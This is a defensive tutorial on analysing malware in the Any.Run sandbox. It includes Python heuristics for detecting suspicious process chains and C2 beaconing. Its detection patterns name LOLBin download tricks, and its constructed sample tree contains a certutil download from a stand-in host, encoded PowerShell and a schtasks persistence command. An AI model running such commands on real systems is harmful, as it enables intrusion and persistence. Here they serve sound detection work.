// What is Any.Run?
Any.Run is an interactive online malware sandbox. Unlike automated sandboxes that run a sample and generate a report, Any.Run gives you a live virtual machine in your browser where you can interact with the malware in real time: click through installers, open documents, and observe what happens when you take specific actions.
It's an invaluable tool for blue team analysts and DFIR responders who need to quickly understand what a suspicious file or URL does without exposing a real system to risk.
Any.Run has a free public tier where submissions and reports are publicly visible. If you're analysing sensitive files (internal documents, corporate malware samples), use a private submission, which requires a paid account. Never submit files containing sensitive company or personal data on the free tier.
// Sandbox Concepts
Isolation
The sample runs in a disposable VM with no connection to real systems. Network traffic is intercepted for analysis rather than routing to the actual internet (unless you enable real network access).
Instrumentation
Every system call, process spawn, network connection, file write, and registry change is monitored and recorded, giving you complete visibility into what the sample does.
Interactivity
Unlike automated sandboxes, Any.Run lets you interact with the VM: open files, click buttons, enter credentials. Malware that waits for user interaction or checks for a VM environment can be triggered manually.
Time limit
Free sessions run for 60 seconds. Paid plans extend to several minutes. Some malware has long sleep timers; use the time slider to advance the analysis if activity stalls.
// Submitting Samples
Any.Run accepts files (EXE, DLL, DOC, PDF, ZIP, etc.) and URLs. Key options when submitting:
| Option | Description | When to use |
|---|---|---|
| OS Version | Windows 7, 10, or 11; select to match the target environment | Match the OS of the victim host when analysing an incident |
| Bitness | 32-bit or 64-bit | Match the victim architecture; some malware checks this |
| Real network | Routes traffic to actual internet instead of simulated | Needed if C2 infrastructure is live and you want to see real callbacks |
| Fake net | Simulates network responses; keeps malware running even when C2 is down | Useful for analysing malware when C2 is offline |
| Privacy | Public (free) or Private (paid) | Always use Private for real incident samples |
| Run as admin | Starts the sample with administrator privileges | When malware requires elevated privileges to run |
| MITM | Intercepts HTTPS traffic for decryption | When malware uses HTTPS C2 and you want to see request contents |
Before submitting, search the Any.Run public task database for the file hash first. If someone has already analysed the same sample, you can review their report instantly without spending a submission.
// Reading the Report
The Any.Run report has several panels; understanding each one helps you quickly extract the information you need.
| Panel | What it shows |
|---|---|
| Process Graph | Visual tree of all spawned processes; the most important view for understanding the execution chain |
| Network Activity | DNS queries, HTTP requests, and connections; shows C2 callbacks, payload downloads, and exfiltration |
| File Activity | Files created, modified, or deleted; dropped payloads, configuration files, ransom notes |
| Registry Activity | Registry keys read or written; persistence mechanisms, configuration storage |
| Threats | Any.Run's verdict and tagged signatures: malware family, MITRE techniques |
| IOCs | Extracted indicators (IPs, domains, hashes, file paths), exportable for threat hunting |
| Suricata Alerts | Network IDS hits: known malware traffic patterns matched against Suricata rules |
// Process Tree Analysis
The process tree is the heart of the analysis. It shows every process that ran during the session, their parent-child relationships, and tags suspicious activity inline.
What to look for
Suspicious parent-child
Office applications spawning cmd.exe or powershell.exe is a classic macro or exploit indicator. A browser spawning wscript.exe points to a drive-by download.
Process injection
Malware code running inside a legitimate process (e.g. code inside explorer.exe or svchost.exe making network connections it normally wouldn't). Look for activity that doesn't match the process name.
LOLBins
Living-off-the-land binaries: certutil, regsvr32, mshta, bitsadmin, and rundll32 used with unusual arguments to download or execute payloads.
Privilege escalation
Processes starting as a standard user and later appearing with SYSTEM or elevated context; look for UAC bypass attempts or token manipulation.
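The checks above (suspicious parent-child pairs, LOLBin arguments, encoded PowerShell, scheduled-task persistence) can be turned into simple rules over a process list, tagged with the ATT&CK IDs that this page's MITRE table uses. The following is an added example written for this page, not Any.Run's code or export format: the `Proc` records and the sample tree are constructed, the technique tags are assumptions (T1218 and T1059.005 are real ATT&CK IDs but do not appear in the table on this page), and the argument patterns are a starting heuristic set, not an exhaustive one.

```python
"""Heuristics over a process tree, modelled on what an analyst looks for
in the Any.Run process graph: suspicious parent-child pairs, LOLBin
abuse, encoded PowerShell and scheduled-task persistence.
Added example with constructed data; not Any.Run's own code."""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # executable name, lower-case
    cmdline: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# ATT&CK sub-technique for each interpreter a document process might spawn.
SHELL_TECHNIQUE = {
    "cmd.exe": "T1059.003",
    "powershell.exe": "T1059.001",
    "pwsh.exe": "T1059.001",
    "wscript.exe": "T1059.005",
    "cscript.exe": "T1059.005",
    "mshta.exe": "T1218",
}
# Argument patterns that turn a signed system binary into a downloader
# or script runner (System Binary Proxy Execution, T1218). Heuristic set.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "bitsadmin.exe": re.compile(r"/transfer", re.I),
    "rundll32.exe": re.compile(r"javascript:|url\.dll", re.I),
}
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\b", re.I)


def chain(by_pid, pid):
    """Render the ancestry of `pid` as 'root.exe > ... > leaf.exe'."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return " > ".join(reversed(names))


def analyse(procs):
    """Return (technique_id, rule_name, process_chain) findings."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent and parent.image in OFFICE and p.image in SHELL_TECHNIQUE:
            findings.append((SHELL_TECHNIQUE[p.image], "office-spawns-shell", chain(by_pid, p.pid)))
        if parent and parent.image in BROWSERS and p.image in SCRIPT_HOSTS:
            findings.append(("T1059.005", "browser-spawns-script", chain(by_pid, p.pid)))
        if p.image in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(p.cmdline):
            findings.append(("T1059.001", "encoded-powershell", chain(by_pid, p.pid)))
        if p.image == "schtasks.exe" and re.search(r"/create\b", p.cmdline, re.I):
            findings.append(("T1053.005", "scheduled-task-created", chain(by_pid, p.pid)))
        pattern = LOLBIN_PATTERNS.get(p.image)
        if pattern and pattern.search(p.cmdline):
            findings.append(("T1218", "lolbin-download-or-exec", chain(by_pid, p.pid)))
    return findings


# Constructed sample tree (not a real session): a macro document spawns
# cmd -> encoded PowerShell -> certutil download + schtasks persistence.
SAMPLE_TREE = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "winword.exe", '"WINWORD.EXE" /n invoice.docm'),
    Proc(300, 200, "cmd.exe", "cmd.exe /c powershell -enc QQBCAEMA"),
    Proc(400, 300, "powershell.exe", "powershell -enc QQBCAEMA"),
    Proc(500, 400, "certutil.exe",
         "certutil -urlcache -split -f http://example.invalid/a.bin %TEMP%\\a.bin"),
    Proc(600, 400, "schtasks.exe",
         "schtasks /create /tn Updater /tr %APPDATA%\\a.exe /sc onlogon"),
    Proc(700, 100, "chrome.exe", "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for technique, rule, proc_chain in analyse(SAMPLE_TREE):
        print(f"{technique:10} {rule:26} {proc_chain}")
```

The ancestry string is the part worth keeping in an incident note: "explorer.exe > winword.exe > cmd.exe > powershell.exe" tells the reader the macro-to-shell chain at a glance, which is what the Process Graph panel is showing visually. Note that the encoded-PowerShell rule only fires on the PowerShell process itself, not on the cmd.exe that launched it, so each behaviour is reported once.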
Colour coding in the process tree
| Colour | Meaning |
|---|---|
| Red | Process flagged as malicious: confirmed or highly suspicious activity |
| Orange | Suspicious: potentially malicious behaviour detected |
| Yellow | Informational: notable behaviour but not necessarily malicious |
| Grey | Clean / system process |
// Network Activity
The Network tab shows all DNS queries, HTTP/HTTPS requests, and raw TCP/UDP connections made during the session.
Key things to extract
| Type | What to look for |
|---|---|
| DNS queries | C2 domain names; look for DGA-style random strings, recently registered domains, or known malicious domains |
| HTTP GET | Payload download URLs; note the path and any query parameters (they often contain a victim ID or encoded data) |
| HTTP POST | Data being sent out; check the request body for stolen credentials, system info, or encoded exfiltrated data |
| User-Agent | Often hardcoded in malware; note the exact string for detection rules |
| Beaconing pattern | Regular intervals of identical requests; note the interval and URL for C2 detection |
| IP addresses | Direct IP connections (no DNS) are suspicious; often C2 infrastructure avoiding domain-based blocking |
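Several rows in the table above are mechanical enough to script once the Network tab's events are in hand: beaconing shows up as near-constant intervals between identical requests, direct-IP connections are hosts that parse as IP literals, and DGA-style names have long, high-entropy labels. The following added example is not Any.Run's code or export format; the event dictionaries, the thresholds (four requests, coefficient of variation under 0.2, label length ten, 3.5 bits of entropy) and the sample traffic are all constructed for illustration.

```python
"""Triage of sandbox network events: beaconing intervals, direct-IP
connections, DGA-looking host labels, POST bodies and User-Agents.
Added example over constructed events; not Any.Run's own export format."""
import ipaddress
import math
import statistics
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits of entropy per character; random DGA labels score high."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def looks_dga(host, min_len=10, min_entropy=3.5):
    """Flag a host if any label is long and high-entropy (heuristic only;
    CDN hostnames can also trip this, so treat it as a lead, not a verdict)."""
    return any(len(label) >= min_len and shannon_entropy(label) >= min_entropy
               for label in host.split("."))


def detect_beacons(events, min_count=4, max_cv=0.2):
    """Group identical requests and flag regular intervals.
    Returns [(host, path, mean_interval_seconds)]."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["host"], e["method"], e["path"])].append(e["t"])
    beacons = []
    for (host, method, path), times in by_key.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        # Coefficient of variation near zero means a fixed-interval timer.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            beacons.append((host, path, round(mean, 1)))
    return beacons


def triage(events):
    """Summarise what the Network tab rows ask you to extract."""
    hosts = {e["host"] for e in events}
    return {
        "beacons": detect_beacons(events),
        "direct_ip": sorted(h for h in hosts if is_ip_literal(h)),
        "dga_like": sorted(h for h in hosts if not is_ip_literal(h) and looks_dga(h)),
        "user_agents": sorted({e["ua"] for e in events if e.get("ua")}),
        "posts": [(e["host"], e["path"], len(e.get("body", b"")))
                  for e in events if e["method"] == "POST"],
    }


# Constructed sample traffic; times are seconds since session start.
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  # constructed hard-coded UA
SAMPLE_EVENTS = [
    {"t": 5, "method": "GET", "host": "cdn.example.com", "path": "/a.bin", "ua": UA},
    {"t": 10, "method": "POST", "host": "203.0.113.45", "path": "/gate.php", "ua": UA,
     "body": b"id=1234&os=win10"},
    {"t": 12, "method": "GET", "host": "xk3qpd9zt1wbnf.example.net", "path": "/", "ua": UA},
] + [{"t": t, "method": "GET", "host": "sync.example.com", "path": "/ping", "ua": UA}
     for t in (0, 60, 121, 180, 240)]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_EVENTS).items():
        print(f"{key}: {value}")
```

The interval check deliberately tolerates jitter: many C2 clients add a small random sleep, so a strict equality test on the gaps would miss them, while the coefficient of variation still sits near zero. A sixty-second session (the free tier) will only ever contain a few beacons, so lower `min_count` or extend the run if the host of interest appears fewer than four times.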
// File System Activity
Every file created, modified, renamed, or deleted during execution is logged. This reveals:
Dropped payloads
Second-stage executables written to disk; note the path and hash. Common drop locations: %TEMP%, %APPDATA%, C:\ProgramData.
Config files
Malware often writes configuration to disk: RC4 keys, C2 addresses, victim identifiers. These files may be encrypted or obfuscated.
Persistence files
Files written to startup folders (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), or copies of the malware in system directories.
Ransomware
Bulk file modification followed by new extensions (.locked, .enc) and ransom note files appearing. Ransom notes contain C2 contact details.
// IOC Extraction
Any.Run's IOC tab compiles all indicators of compromise from the session into a single exportable list. Key IOC types:
| IOC type | How to use it |
|---|---|
| File hashes (MD5, SHA-1, SHA-256) | Block in EDR/AV; search in SIEM for historical matches; submit to VirusTotal |
| IP addresses | Block at firewall; search in SIEM for connections; check reputation in threat intel |
| Domains | Block at DNS/proxy; search SIEM DNS logs; check registration date and WHOIS |
| URLs | Block at web proxy; search proxy logs; may contain unique campaign identifiers |
| File paths | Hunt for the same paths on other endpoints in your environment |
| Registry keys | Hunt for the same persistence keys across endpoints |
| Mutex names | Mutexes are created by malware to prevent re-infection; unique per malware family, useful for detection rules |
Export IOCs in MISP, JSON, or plain text format from the Any.Run report. Import them directly into your SIEM, SOAR, or threat intel platform to automate hunting across your environment.
// MITRE ATT&CK Mapping
Any.Run automatically tags observed behaviours with MITRE ATT&CK techniques. This is invaluable for incident reporting and for understanding attacker intent.
Common techniques seen in sandbox analysis
| Technique ID | Name | What it looks like in Any.Run |
|---|---|---|
| T1059.001 | PowerShell | PowerShell spawned, often with the -enc flag (encoded command execution) |
| T1059.003 | Windows Command Shell | cmd.exe with unusual arguments or spawned from document process |
| T1055 | Process Injection | Malicious code executing inside a legitimate host process |
| T1547.001 | Registry Run Keys | HKCU\Software\Microsoft\Windows\CurrentVersion\Run modified |
| T1053.005 | Scheduled Task | schtasks.exe run with /create argument |
| T1071.001 | Web Protocols (C2) | HTTP/HTTPS to unusual domain after execution |
| T1486 | Data Encrypted for Impact | Bulk file modification with new extensions (ransomware) |
| T1562.001 | Disable Security Tools | AV/EDR services stopped; Windows Defender disabled via registry |
// Tips & Best Practices
Interact with the sample. Any.Run's biggest advantage over automated sandboxes is interactivity. If a sample opens a document, click Enable Content. If it shows a password prompt, try common passwords. If it waits for input, provide it; malware often gates further activity behind user interaction.
Use fake network mode for offline C2. If the malware's C2 server is down, it may exit quickly or loop waiting for a connection. Enable Fake Net to simulate network responses; this keeps the malware running so you can observe more behaviour.
Cross-reference with VirusTotal. Once you have file hashes from the analysis, submit them to VirusTotal for additional vendor coverage. Any.Run shows behavioural analysis; VirusTotal shows signature-based detection rates across 70+ engines.
Malware can detect sandboxes. Some malware checks for VM artefacts (CPUID, registry keys, process names, screen resolution) and behaves differently or exits. Any.Run has some anti-evasion options, but sophisticated malware may still detect the environment. In those cases, consider using a private bare-metal environment.